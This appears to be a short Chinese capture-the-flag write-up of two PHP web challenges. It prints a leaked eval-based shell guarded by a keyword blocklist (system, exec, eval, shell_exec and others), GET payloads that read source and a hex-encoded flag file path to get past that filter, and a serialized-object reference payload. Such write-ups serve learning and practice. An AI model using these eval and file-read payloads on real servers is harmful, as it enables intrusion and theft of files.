就做了两道题,一天做一道,一道坐一天。 @(huaji_han)
发现有源码泄漏 www.rar
有发现有key.php,里面发现有个shell
<?php class XJNU{ private function flag(){ echo $flag; } } if(preg_match("/system|exec|eval|shell_exec|passthru|phpinfo/i" , $_GET['f'])){ die("do not attack me"); } if(preg_match("/system|exec|eval|shell_exec|passthru|phpinfo/i" , $_GET['c'])){ die("do not attack me"); } if(preg_match("/XJNU|flag/i" , $_GET['f']) || preg_match("/XJNU|flag/i" , $_GET['c'])){ die("no way!<br>"); } $new = call_user_func_array($_GET['f'],["", $_GET['b']]); eval($_GET['c']); ?>读取源码 c=var_dump(file_get_contents(‘key.php’));
得到flag的路径
Payload:
c=var_dump(file_get_contents(hex2bin(‘2f666c61672e747874’)));
构建一个变量指向$b->c中的地址
<?php $x = new stdclass; $x->c = '$flag'; $x->f = &$x->c; echo '<br>'; echo(serialize($x));payload: a=O:8:"stdClass":2:{s:1:"c";s:5:"$flag";s:1:"d";R:2;}
还说来看看其他师傅的wp 。。 发现找不到,淦
前几天搭建一个自己的博客,欢迎各位师傅参观
http://fstone.top/
